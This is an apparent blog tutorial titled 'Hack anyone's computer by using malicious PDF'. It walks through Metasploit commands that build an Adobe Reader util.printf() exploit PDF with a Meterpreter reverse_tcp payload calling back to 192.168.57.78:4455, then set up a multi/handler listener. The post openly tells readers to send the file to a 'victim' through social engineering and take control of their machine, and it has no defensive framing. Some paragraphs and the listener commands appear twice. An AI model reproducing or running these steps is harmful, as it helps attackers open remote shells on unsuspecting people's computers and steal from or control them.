Hack anyone's computer by using malicious PDF
In this tutorial i will show you how to create a malicious PDF file and hack anyone's computer by exploting Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability.
Adobe Reader is vulnerable to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users.
Adobe Reader is vulnerable to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users.
Our first step is to create a malicious PDF for this we can use the Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability.
msf exploit(adobe_utilprintf) >set FILENAME adobereaderexploit.pdf
we have to set the name of the malicious PDF exploit and this command creates a malicious pdf file
msf exploit(adobe_utilprintf) >set PAYLOAD windows/meterpreter/reverse_tcp
set PAYLOAD – allows you to set the specific payload for your exploit
msf exploit(adobe_utilprintf) >set LHOST 192.168.57.78
set LHOST – allows you to set the local host's IP address for the reverse communications needed to open the reverse command shell
msf exploit(adobe_utilprintf) >set LPORT 4455
set LPORT – allows you to set the port for the reverse communications needed to open the reverse command shell
msf exploit(adobe_utilprintf) >show options
show options – shows the various parameters for the specific exploit you're working with
msf exploit(adobe_utilprintf) >exploit
Here we can see that metasploit saves the pdf in some default location so we need to move our pdf file from the saved location to our desired location for future use.
msf>use exploit/multi/handler
now since we have created a malicious pdf file so before sending it to our victim we need to create a listener
msf exploit(handler)>set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler)>set LHOST 192.168.57.78
msf exploit(handler)>set LPORT 4455
msf exploit(handler)>exploit
msf>use exploit/multi/handler
now since we have created a malicious pdf file so before sending it to our victim we need to create a listener
msf exploit(handler)>set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler)>set LHOST 192.168.57.78
msf exploit(handler)>set LPORT 4455
msf exploit(handler)>exploit
Now we have a malicious pdf file and also our listener is ready we need to use our social engineering skills to send this malicious pdf file to our victim.
Now as you can see when the victim opens or malicious PDF file we get the meterpreter session. In this way we can hack anyone's computer and do whatever we want to do.
%2Bdork%2Blist%2Binfosec%2Baffairs.png)
No comments:
Post a Comment